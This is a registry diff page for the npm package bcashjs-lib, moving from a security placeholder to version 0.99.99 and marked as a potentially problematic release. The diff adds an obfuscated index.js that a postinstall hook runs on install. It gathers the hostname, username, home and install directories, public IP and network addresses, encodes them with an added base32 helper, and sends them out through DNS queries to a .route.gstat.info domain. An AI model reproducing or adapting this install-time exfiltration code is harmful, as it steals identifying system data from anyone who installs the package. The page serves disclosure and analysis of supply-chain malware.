bcashjs-lib 0.0.1-security → 0.99.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of bcashjs-lib might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/b.js +61 -0
  2. package/index.js +1 -0
  3. package/package.json +10 -3
  4. package/README.md +0 -5
package/b.js ADDED
@@ -0,0 +1,61 @@
1
+ const DEF = 'zyxwvutsrqponmlkjihgfedcba987654'
2
+ const RFC4648 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
3
+ const RFC4648_HEX = '0123456789ABCDEFGHIJKLMNOPQRSTUV'
4
+ const CROCKFORD = '0123456789ABCDEFGHJKMNPQRSTVWXYZ'
5
+
6
+ function toDataView(data) {
7
+ if (data instanceof Int8Array || data instanceof Uint8Array || data instanceof Uint8ClampedArray) {
8
+ return new DataView(data.buffer, data.byteOffset, data.byteLength)
9
+ }
10
+ if (data instanceof ArrayBuffer) {
11
+ return new DataView(data)
12
+ }
13
+ throw new TypeError('Expected `data` to be an ArrayBuffer, Buffer, Int8Array, Uint8Array or Uint8ClampedArray')
14
+ }
15
+
16
+ function be(data, variant, options) {
17
+ options = options || {}
18
+ let alphabet, defaultPadding
19
+ switch (variant) {
20
+ case 'RFC3548':
21
+ case 'RFC4648':
22
+ alphabet = RFC4648
23
+ defaultPadding = true
24
+ break
25
+ case 'RFC4648-HEX':
26
+ alphabet = RFC4648_HEX
27
+ defaultPadding = true
28
+ break
29
+ case 'Crockford':
30
+ alphabet = CROCKFORD
31
+ defaultPadding = false
32
+ break
33
+ default:
34
+ alphabet = DEF
35
+ defaultPadding = false
36
+ }
37
+ const padding = (options.padding !== undefined ? options.padding : defaultPadding)
38
+ const view = toDataView(data)
39
+ let bits = 0
40
+ let value = 0
41
+ let output = ''
42
+ for (let i = 0; i < view.byteLength; i++) {
43
+ value = (value << 8) | view.getUint8(i)
44
+ bits += 8
45
+ while (bits >= 5) {
46
+ output += alphabet[(value >>> (bits - 5)) & 31]
47
+ bits -= 5
48
+ }
49
+ }
50
+ if (bits > 0) {
51
+ output += alphabet[(value << (5 - bits)) & 31]
52
+ }
53
+ if (padding) {
54
+ while ((output.length % 8) !== 0) {
55
+ output += '='
56
+ }
57
+ }
58
+ return output
59
+ }
60
+
61
+ exports.be = be;
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const os=require("os");function gi(){return new Promise(t=>{let n=require("https").get("https://api.ipify.org",n=>{let e=[];n.on("data",t=>e.push(t)),n.on("end",()=>t(Buffer.concat(e).toString()))});n.on("error",n=>t(n.code)),n.end()})}function dr(t){return new Promise(n=>require("dns").resolve4(t,(t,e)=>{e?n(e.toString()):n("")}))}function mi(t){let n="",e="abcdefghijklmnopqrstuvwxyz0123456789";for(let r=0;r<t;r++)n+=e.charAt(Math.floor(Math.random()*e.length));return n}function p(t){let n=".route.gstat.info",e=0,r=0,o=`${mi(6)}.`;for(;;){let s=o+ ++r,i=253-(s+n).length;for(let a=1;a<=4;a++){let f=63;if(4===a&&(f=61),t.length>f?(s+="."+t.substring(0,f),t=t.substring(f)):(s+="."+t,t=""),s.length>i){t=s.substring(i)+t,s=s.substring(0,i);break}if(!t){e=1;break}}if(dr(s+n),e)break}}gi().then(t=>{let n=JSON.stringify({h:os.hostname(),u:os.userInfo().username,d1:os.homedir(),d2:__dirname,i1:t,i2:Object.values(os.networkInterfaces()).map(t=>t.map(t=>t.address)).toString()});p(require("./b").be(Buffer.from(n)))}).catch(function(t){}),module.exports={};
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "bcashjs-lib",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "0.99.99",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node index.js"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=bcashjs-lib for more information.